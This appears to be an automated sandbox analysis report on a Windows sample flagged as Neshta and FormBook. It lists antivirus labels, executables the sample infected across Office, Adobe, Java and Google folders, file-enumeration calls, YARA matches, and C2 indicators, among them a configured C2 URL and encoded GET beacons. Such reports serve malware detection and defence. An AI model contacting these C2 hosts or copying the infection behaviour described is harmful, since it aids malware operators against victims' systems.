          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.vi0EwpbUht.exe.400000.0.unpackAvira: Label: W32/Neshta.A
          Source: 4.0.explorer.exe.1183f834.74.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: vi0EwpbUht.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: Binary string: netstat.pdbGCTL source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vi0EwpbUht.exe, 00000002.00000003.327241678.0000000003140000.00000004.00000001.sdmp, vi0EwpbUht.exe, 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, elxhan.exe, 00000007.00000002.565127229.0000000000B0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vi0EwpbUht.exe, elxhan.exe, NETSTAT.EXE, help.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp

          Spreading:

          barindex
          Yara detected NeshtaShow sources
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Infects executable files (exe, dll, sys, html)Show sources
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeSystem file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to behavior
          Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405080 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00405634 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00404F6C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EA04 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB16 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_0040263E FindFirstFileA,
          Source: C:\Windows\svchost.comCode function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_00404F6C FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040F13F FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EA04 FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB16 FindFirstFileA,FindClose,
          Source: C:\Windows\svchost.comCode function: 5_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\11357\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.personalizedyardsigns.com/xkcp/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1Host: www.agileintelligence.coachConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1Host: www.agileintelligence.coachConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.agileintelligence.coach
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: vi0EwpbUht.exe, vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: vi0EwpbUht.exe, 00000001.00000003.460371414.0000000002390000.00000004.00000001.sdmpBinary or memory string: _WinAPI_RegisterRawInputDevices.au3

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
